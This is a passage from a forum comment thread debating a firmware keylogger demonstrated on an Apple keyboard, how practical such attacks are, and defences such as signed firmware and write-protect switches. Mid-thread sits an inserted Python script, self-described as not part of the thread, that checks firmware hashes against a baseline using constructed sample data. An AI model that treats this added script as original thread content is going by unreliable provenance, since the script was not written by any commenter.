      My history is going to point to the domain I visited, and contain the URL the hackeyboard built.... I would quickly change my keyboard and hunt the asshat down. "Release the hounds!!!!"

      So what you are saying is you are the grand master of computers... OK great... What is your point??? Most people don't know what a folder is let alone that they have a browser history...

      And you can tell me to think outside the box all you want, but the exploit and its cockroach-ninja state machine have to fit INSIDE a very tiny box that has almost no resources to support such code.

      The keylogger fit inside just fine didn't it? You are trying to argue that something isn't possible or useful just because you can't think of a way to make it so. Maybe you just aren't that smart? You already said you work with this stuff but didn't expect this exploit. I think that says a lot.

      This exploit doesn't get to log enough keystrokes to get more than my local password and a few sentences of my first email of the day. The state machine would have a rough time figuring out what to keep and what to junk due to its very limited footprint.

      Proof of concept is way different than end-user (script kiddy) ready. You claim to work with firmware but you don't even understand that concept?

      Good luck with that.

      Good luck with keeping your job by ignoring something that directly affects you and the company you work for. We can only hope that hackers keep picking the low hanging fruit and don't start reflashing all of our shit with their 'it's funny' code...

    8. Re:Keylogger or Installer by metaforest · · Score: 1

      You wanna spread FUD. Go for it. Peace out.

    9. Re:Keylogger or Installer by ae1294 · · Score: 1

      You wanna spread FUD. Go for it. Peace out.

      Very sorry I upset you with a debate.... Next time I will not reply to a post disagreeing with my post.... Really I promise...

    10. Re:Keylogger or Installer by metaforest · · Score: 1

      Look, ae1294, attacking my credibility is a bullshit debating tactic.

      You clearly don't understand the practical limitations of working in computing spaces so small that there is nowhere near enough room for printf(), let alone any useful subset of glibc. Some of these systems are so resource constrained that they cannot be programmed in anything but their native machine language. They simply do not have the resources to handle the overhead of even a minimal C-runtime. For most HID implementations, it takes a significant amount of shoehorning to get a USB stack running, and still have enough room for your app.

      To be sure, drive-by re-flashing of peripherals is a serious threat. However, the demoed exploit on this particular keyboard doesn't get an attacker very far. There is plenty of low hanging fruit at the OS level, making such exploits largely an academic exercise.

      Hardware vendors do need to start taking more proactive steps to secure their firmware upgrade processes. And the approach could be very simple in some cases, or very difficult depending on the amount of user interaction that the OEM is willing to risk. Typically more user interaction is risky as it can cause bricking, or increased support calls from users who do not understand the steps.

      Keyboards, and many HID units are extremely cost sensitive products. Adding the extra code space, and ram to implement robust re-flash authentication might easily break the budget for the device. In most cases the risk that an attacker can deploy a viable exploit (as opposed to a tech demo) is very low.

      Larger embedded peripherals, with more substantial resources, present a higher risk to the host. I believe that authenticated re-flashing is eventually going to be mandatory. From a business perspective, the potential for increased customer support issues due to compromised peripherals is going to be the driver. User security rides shotgun in that analysis.

      I worry more about having my RAID controller, HDD, DVD, video card, or BIOS re-flashed, than my keyboard. Those devices present a greater win for an attacker than an HID unit.

      These attacks all require that the host is already profoundly compromised. If an attacker already has your system by the 'short hairs' why bother with trying to shoehorn additional malware into a small subset of exploitable peripherals the target might have attached to the system? The system is already pwnd. Beyond hooking the BIOS, which is also a dubious exploit at best, why would a criminal dev team bother?

      As much as people complain about the iPhone being a closed platform, the fact that it can be jailbroken shows how difficult and expensive securing an embedded system can be, and how little comparable effort a determined attacker needs to expend.

      The key point here is motivation. For a keyboard exploit I just don't see that it's going to generate much motivation.

    11. Re:Keylogger or Installer by ae1294 · · Score: 1

      Look, ae1294, attacking my credibility is a bullshit debating tactic.

      Maybe, but it works well in the real world, on TV, in congress, court rooms, pretty much everywhere and you said some stuff that didn't make any sense soooo well you know...

      nowhere near enough room for printf(), let alone any useful subset of glibc

      I mentioned 'ASM' or 'machine code' in one of my messages and I didn't expect anyone to use C to begin with, 1k and all...

      Everything else you said sounds much more logical and agreeable in the rest of this post.

    12. Re:Keylogger or Installer by metaforest · · Score: 1

      I didn't change my opinion from post to post.

      So now you agree with me. That's nice.

      What this really comes down to is:

      The meaning of the communication is the result I got.

      I'll be sure and spell it out for you in the future the first time.

    13. Re:Keylogger or Installer by ae1294 · · Score: 1

      Before -

      Just because some highly skilled Blackhat finds, and demo's a half-assed exploit, does not mean that that it's going to be practical to exploit

      And you can tell me to think outside the box all you want, but the exploit and it's cockroach-ninja state machine have to fit INSIDE a very tiny box that has almost no resources to support such code.

      Good luck with that

      After -

      To be sure, drive-by re-flashing of peripherals is a serious threat

      Hardware vendors do need to start taking more proactive steps to secure their firmware upgrade processes.

      Shrug, alright?
      Yes we've always been at war with eurasia...

    14. Re:Keylogger or Installer by metaforest · · Score: 1

      You conveniently take my quote out of context. I was talking specifically about the keyboard hack in the earlier post.

      But then you know that...

      Fuck off.

    15. Re:Keylogger or Installer by ae1294 · · Score: 1

      take my quote out of context. I was talking specifically about the keyboard hack.

      O... then I retract my previous agreement with you... I was under the impression that you had come round and realized that since someone has demonstrated a working firmware keylogger you had come to your senses as someone who claims to work on firmware every day for what I guess would be a business somewhere. Thus realizing that everyone should start taking this 'generalized firmware threat' seriously. They should have been doing this all along but eh...

      In my opinion, all devices should have a jumper, switch or button that keeps firmware write protected. A button that turns off this protection for 30 minutes would add a trivial amount to the cost of a product and, I for one, would be willing to pay the extra 2 cents for the peace of mind.

      Fuck off.

      and I am only saying that because I care - there's a lot of decaffeinated brands on the market that are just as tasty as the real thing. http://www.imdb.com/title/tt0089886/quotes

      All jokes aside, I am truly sorry that I have caused you such grief, I was trying to point out that this is a REAL problem and NEEDS to the addressed before some jackass hacker starts turning my nice new toys into trash or something much worse like a keylogger or infection vector.

      I can understand that as a firmware developer you would rather see your work used for evil... O wait... No I really can't understand that, wherein lies my confusion.

    16. Re:Keylogger or Installer by ae1294 · · Score: 1

      I mean really... A keyboard firmware, Keylogger... Isn't that a bit ironic, doncha think???

  32. Heh by JoeCommodore · · Score: 1

    I just bought all cheap PC keyboards to replace the aging mac keyboards. mainly because the mac ones are way too expensive... ~$40. Also because all the Mac keyboards have been a point of irritation- from being bright white with clear housing (sure shows crumbs well) to having non-traditional keys (new ones ala mac book keyboard) they just aren't good for the real work environment.

    --
    "Enjoy what you're doing! If it becomes drudgery, you're doing it wrong!" - Jim Butterfield
  33. That's not a bug. by Anonymous Coward · · Score: 3, Informative

    That *is* a feature. It isn't a hacked battery, it is a battery which is hacked to appear as an authentic internal tool, designed to read a certain area on a memory stick, so Sony can quickly restore a problematic PSP.

    It was designed that way, and obscured. The 'hack' merely makes that information public and usable.

    1. Re:That's not a bug. by poopdeville · · Score: 1

      It isn't a hacked battery, it is a battery which is hacked... ...

      --
      After all, I am strangely colored.
    2. Re:That's not a bug. by Anonymous Coward · · Score: 0

      Literally hacked, you gotta cut a wire to make the battery appear to be a maintenance battery.

    3. Re:That's not a bug. by mikiN · · Score: 1

      What's up next, maintenance heated USB slippers? maintenance HDMI cables?

      Security by this kind of obscurity is going to kill us all.

      "You know, I bought this USB pogo stick for my Wii, and after using it for a while, my bank account got berserk. The bank manager told me that the pogo stick must have raided my bank account while I was trying out this new online banking thingy on the Wii..."

      --
      The Hacker's Guide To The Kernel: Don't panic()!
  34. No... by Bat+Country · · Score: 1

    It might run "Pitfall!" though.

    --
    The land shall stone them with the bread of his son.
  35. perhaps the same people by Anonymous Coward · · Score: 0

    who have infiltrated factories that make digital USB picture frames and inserted viral code in their mass storage?

  36. Lies! by Yeechang+Lee · · Score: 0, Troll

    I use an Apple key/b/ r00lzboard anCredit Card Transaction CompleteddI've never seen aHAHA U BN PWN3Dnything like this happen. More anti-Apple proparickrolledganda!

  37. On the plus side ... by Sean+D.+Solle · · Score: 1

    ... at least there's now a chance of someone fixing that bloody Caps Lock delay

  38. Update it by Anonymous Coward · · Score: 0

    Apple has had flash updates for their keyboards before. So they have another one to fix this problem. If it really is a problem. Lots of so called mac hackers have claimed exploits that are not real.

  39. OpenBSD? by xdor · · Score: 1

    I want to know if OpenBSD thought of this already and blocked it, or if this is their 3rd hole

    1. Re:OpenBSD? by Anonymous Coward · · Score: 0

      There is no keyboard in a default install of OpenBSD.

  40. if this works on their Bluetooth keyboard by vaporland · · Score: 1

    could be even more interesting!

    --
    Ask Me About... The 80's!
  41. Additional Information by vaporland · · Score: 1

    Notes

    1. If you do not develop software, verbose and single-user modes are only needed when troubleshooting the computer for a startup issue.
    2. You cannot enter single user or verbose mode if the computer owner or administrator has enabled Open Firmware Password Protection.*
    3. When in single-user mode, the keyboard layout is US English.


    * I do on my MacBookPro...

    --
    Ask Me About... The 80's!
  42. Re:Too much work by toddestan · · Score: 1

    That doesn't mean there is anything complex going on in the keyboard itself. They could do something as simple as shorting one of the pins on the ribbon cable to ground to tell the controller that it's a UK layout.

  43. Should HW Vendors block (unsigned) Firmwares? by Val314 · · Score: 1

    So what does /. think?
    -) Block all unsigned firmware, locking out the hacker community for the sake of "security"?
    -) Allow hacks and custom firmware? (with the possibility of security issues)
    -) Think "my firmware will never have any bugs, I'll put it in a ROM" (with the risk of recalling the HW when a serious issue is found)

  44. YAGT: Yet Another Gelded Trojan by macs4all · · Score: 1

    As I see it, this requires Social Engineering to work, and is therefore only possible through the use of a Trojan.

    1. If you are using Apple's keyboard updater/bootloader, then THAT has to run on the intended victim's machine. That requires either physical access or the use of a Trojan to dupe users into typing an admin password. In both cases, that's not as easy as it sounds.

    2. If you (as hacker) have reverse-engineered Apple's keyboard bootloader protocol and written your own updater/bootloader (that would be crafted to not require a password), then you STILL need to get the user to run that ON THEIR MACHINE. Again, you need either physical access or a Trojan.

  45. Re-Boot by Anonymous Coward · · Score: 0

    Would the fix be this easy? On boot the OS re-flashes USB devices with the current correct instruction set? On a sophomoric level, it does seem someone is Apple bashing for an issue that is not limited to their products.

    1. Re:Re-Boot by mikiN · · Score: 1

      If it is still true that Flash memory lasts a limited number of write cycles, reflashing on every boot would eventually kill your devices.

      I think it would be better to (periodically) checksum all firmware on devices and raise an alarm if there is any mismatch.

      --
      The Hacker's Guide To The Kernel: Don't panic()!
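One way to implement the "periodically checksum all firmware and raise an alarm on mismatch" idea from the comment above, as an added example that is not from this thread, from Apple, or from the researcher's code. It assumes a hypothetical host-side readback of each device's firmware image (modelled here by constructed byte strings under made-up device names such as `keyboard-usb`); it goes slightly beyond the comment by also flagging a baselined device that has vanished and a device that was never baselined, which is what a swapped-in keyboard would look like to the host.

```python
"""Baseline-and-verify check for peripheral firmware images (added example).

Assumptions (not from the thread): a host-side tool can read back each
device's firmware image through some trusted path, modelled here by
constructed byte strings. The check only reads, so it does not consume
flash write cycles the way re-flashing on every boot would.
"""
import hashlib
import hmac
import json
from typing import Dict, List, Tuple

Finding = Tuple[str, str]  # (device name, reason for the alarm)


def fingerprint(image: bytes) -> str:
    """SHA-256 hex digest of one firmware image."""
    return hashlib.sha256(image).hexdigest()


def build_baseline(images: Dict[str, bytes]) -> Dict[str, str]:
    """Record the known-good digest of every enumerated device."""
    return {dev: fingerprint(img) for dev, img in images.items()}


def save_baseline(baseline: Dict[str, str]) -> str:
    """Serialise the baseline, e.g. to keep a copy on read-only media."""
    return json.dumps(baseline, sort_keys=True)


def load_baseline(blob: str) -> Dict[str, str]:
    return json.loads(blob)


def verify(baseline: Dict[str, str], current: Dict[str, bytes]) -> List[Finding]:
    """Compare a fresh readback against the baseline and return alarms.

    Reported conditions: a baselined device whose image changed, a baselined
    device that is no longer present, and a device that was never baselined.
    """
    findings: List[Finding] = []
    for dev, expected in baseline.items():
        if dev not in current:
            findings.append((dev, "device missing from enumeration"))
            continue
        actual = fingerprint(current[dev])
        # constant-time compare is cheap insurance when the digest is a secret input
        if not hmac.compare_digest(actual, expected):
            findings.append((dev, "firmware hash mismatch"))
    for dev in current:
        if dev not in baseline:
            findings.append((dev, "unbaselined device"))
    return findings


def _image(seed: bytes, size: int = 1024) -> bytes:
    """Constructed stand-in for a firmware dump: deterministic filler bytes."""
    out = b""
    counter = 0
    while len(out) < size:
        out += hashlib.sha256(seed + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:size]


# Constructed sample readbacks; the device names are hypothetical.
GOOD_IMAGES: Dict[str, bytes] = {
    "keyboard-usb": _image(b"kbd-fw-v1"),
    "mouse-usb": _image(b"mouse-fw-v1"),
}
BASELINE = build_baseline(GOOD_IMAGES)


def tampered_snapshot() -> Dict[str, bytes]:
    """Constructed later readback: keyboard image altered, unknown hub present."""
    kbd = bytearray(GOOD_IMAGES["keyboard-usb"])
    kbd[-64:] = b"\xff" * 64  # simulated change in the previously unused tail of flash
    return {
        "keyboard-usb": bytes(kbd),
        "mouse-usb": GOOD_IMAGES["mouse-usb"],
        "hub-usb": _image(b"hub-fw-unknown"),
    }


if __name__ == "__main__":
    for dev, why in verify(BASELINE, tampered_snapshot()):
        print(f"ALARM {dev}: {why}")
```

The weak point is the readback path, which is where the earlier reply about compromised hosts applies: if the image is fetched through the device's own firmware, a modified firmware can simply return the original bytes, so the hash only catches tampering that does not also hook the dump routine. A readback enforced by hardware, or a write-enable switch as suggested in an earlier comment, is what makes the baseline trustworthy.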
  46. Emily by Impy+the+Impiuos+Imp · · Score: 0, Offtopic

    > The vulnerability was discovered by K Chen

    That guy's a fucking idiot! He couldn't think his way out of a paper bag.

    Oh, wait. I thought you said K Fed. n/m

    --
    (-1: Post disagrees with my already-settled worldview) is not a valid mod option.
  47. Re:Too much work by Anonymous Coward · · Score: 0

    You(r Coke) just hacked a keyboard.
    Congratulations!